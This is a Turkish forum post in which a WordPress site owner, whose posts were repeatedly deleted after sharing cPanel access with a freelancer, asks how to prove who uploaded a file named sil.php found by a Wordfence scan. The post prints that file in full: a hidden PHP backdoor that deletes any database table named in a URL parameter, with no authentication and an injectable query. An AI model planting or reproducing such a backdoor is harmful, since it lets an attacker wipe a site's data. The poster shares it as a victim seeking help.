daha önce forumdan birine site hızlandırma çalışması yaptırdım çalışmanın sahte bir çalışma olduğunu öğrenince şikayet konusu açıp para iadesi ve yapılan işlemlerin geri alınmasını istedim mod beni haklı buldu bende kişiye cpanel ve wp bilgilerimi 14 şubatta verdim kişi yaptığı işlemleri kaldırdı ancak sanırım sadece bununla kalmamış kötü amaçlı kodlar eklemiş siteye bunu daha sonradan farkettik.

daha sonra forumdan @wordpress_rasim; 'e çalışma yaptırdık temiz iş çıkardı ancak çalışma bittikten sonra bir süre sonra sitedeki tüm gönderilerin silindiğini gördüm yedekleri yükledim ve rasim hocam tekrar gerekli ayarlamlrı yaptı bir süre sonra yine tüm gönderiler silindi sonra hacklendiğimi düşünüp wordfence ile tarattım daha sonra /wp-includes/blocks/block klasöründe sil.php adında bir dosya farkettim dosyanın içeriğini aşağıya bırakıyorum

dosyayı incelediğimde 14 şubat günü yüklendiğini gördüm. bu dosyayı bahsi geçen kişinin yüklediğini nasıl kanıtlayabilirim?

<?php
try {
$db = new PDO("mysql:host=localhost;dbname=xxxx_wp;charset=utf8", "kusdfxx_wp", "!E?i%sdsdaf!jY0G");
} catch ( PDOException $e ){
     print $e->getMessage();
}

$tablo = $_GET['tablo'];
$id = $_GET['id'];
if($id!=""){
    $sorgu = "WHERE id='".$id."'";
}
$delete = $db->exec("DELETE FROM {$tablo} {$sorgu} ");
print 'Toplam '.$delete.' 端ye silindi!';
?>